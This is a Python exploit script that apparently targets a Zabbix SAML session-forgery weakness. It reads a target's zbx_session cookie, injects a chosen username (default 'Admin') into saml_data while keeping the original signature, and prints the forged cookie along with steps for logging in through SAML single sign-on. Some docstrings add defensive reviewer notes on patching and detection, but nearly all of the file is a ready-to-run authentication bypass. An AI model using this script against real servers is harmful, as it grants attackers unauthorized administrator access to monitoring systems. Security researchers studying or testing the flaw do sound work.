import requests
import re
import urllib.parse
import base64
import json
import sys
import urllib3
# Suppress urllib3 warnings for the whole process. With no argument this
# covers the HTTPWarning family, which includes the InsecureRequestWarning
# that exp() would otherwise trigger by calling requests.get(verify=False).
# NOTE(review): the silence is global, so unverified TLS goes unreported
# for every request this process makes, not only the one in exp().
urllib3.disable_warnings()
def highligth_green(msg):
    """Return *msg* wrapped in ANSI colour codes (green on black) plus a reset.

    The function name is misspelled ("highligth"); it is kept as-is because
    exp() calls it under this name.
    """
    return f"\033[0;32;40m{msg}\033[0m"
def highlight_yellow(msg):
    """Return *msg* wrapped in ANSI colour codes (yellow on black) plus a reset."""
    return f"\033[0;33;40m{msg}\033[0m"
def exp(target, username):
    """Re-encode a Zabbix ``zbx_session`` cookie with a SAML username added.

    Fetches *target*, takes the ``zbx_session`` value from the ``Set-Cookie``
    response header, decodes it (URL-decoding, Base64, JSON) and builds a new
    cookie value that keeps the server-issued ``sessionid`` and ``sign`` but
    adds ``saml_data.username_attribute`` set to *username*. The result is
    only printed; this function sends nothing back to the server.

    Reviewer notes (defensive):
      * ``sign`` is copied unchanged while ``saml_data`` is new, so the
        printed cookie can only be accepted by a server that trusts
        ``saml_data`` without checking it against ``sign``. That appears to
        be the weakness demonstrated here -- confirm against the vendor
        advisory, and run a fixed front-end release (or keep SAML sign-in
        disabled where it is not used).
      * The cookie is plain Base64-encoded JSON, so it can be inspected on
        the server side. NOTE(review): a ``zbx_session`` carrying a
        ``saml_data`` key on a session that never went through the identity
        provider looks like a useful detection signal -- verify against
        normal SAML logins before alerting on it.

    Raises:
        TypeError: the response has no ``Set-Cookie`` header (``re.findall``
            is handed ``None``).
        IndexError: no ``zbx_session=...; `` pair was found in the header.
        KeyError: the decoded JSON lacks ``sessionid`` or ``sign``.
    """
    # verify=False: TLS certificate checks are off, so the origin of the
    # cookie read below is not authenticated.
    response = requests.get(url=target, verify=False)
    set_cookie = response.headers.get("Set-Cookie")
    matches = re.findall(r"zbx_session=(.*?); ", set_cookie)

    # Cookie layers, outermost first: URL-encoding -> Base64 -> UTF-8 JSON.
    unquoted = urllib.parse.unquote(matches[0], encoding='utf-8')
    session = json.loads(base64.b64decode(unquoted).decode('utf-8'))

    # Same key order as the original construction; sessionid and sign are
    # carried over verbatim from the server-issued cookie.
    rebuilt_session = {
        "saml_data": {"username_attribute": username},
        "sessionid": session["sessionid"],
        "sign": session["sign"],
    }

    # Re-apply the layers in reverse: JSON -> Base64 -> URL-encoding.
    encoded = base64.b64encode(json.dumps(rebuilt_session).encode())
    payload = urllib.parse.quote(encoded)

    print("[+] zbx_signed_session:", highlight_yellow(payload))
    print(f"[+] Visit {target}, use zbx_signed_session replace cookie")
    sso_label = highligth_green("Sign in with Single Sign-On (SAML)")
    print("[+] Click " + sso_label + " to login")
def usage():
    """Print the command-line synopsis to stdout.

    TARGET is required; USERNAME is optional and defaults to "Admin".
    """
    synopsis = (
        "Usage:",
        "\tpython3 zabbix_session_exp.py <TARGET> [USERNAME]\t Default username: Admin",
    )
    print(*synopsis, sep="\n")
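if __name__ == "__main__":
    # Command-line entry point: <TARGET> is required, [USERNAME] is optional.
    cli_args = sys.argv[1:]

    if not cli_args:
        usage()
        sys.exit(0)

    if len(cli_args) > 2:
        # The original if/elif chain had no branch for extra arguments, so
        # target/username stayed unbound and exp() failed with a NameError.
        # Reject the invocation explicitly instead.
        usage()
        sys.exit(1)

    target = cli_args[0]
    # "Admin" is the default advertised by usage().
    username = cli_args[1] if len(cli_args) == 2 else "Admin"
    exp(target, username)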